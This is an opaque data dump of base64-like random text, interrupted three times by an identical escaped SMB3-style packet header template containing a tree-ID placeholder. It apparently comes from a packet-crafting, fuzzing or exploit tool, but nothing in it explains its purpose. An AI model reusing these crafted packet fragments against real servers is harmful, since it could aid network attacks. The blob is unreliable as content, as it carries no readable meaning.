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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0S\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0c\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0s\\\\x00\\\\x00\\\\x00\\\\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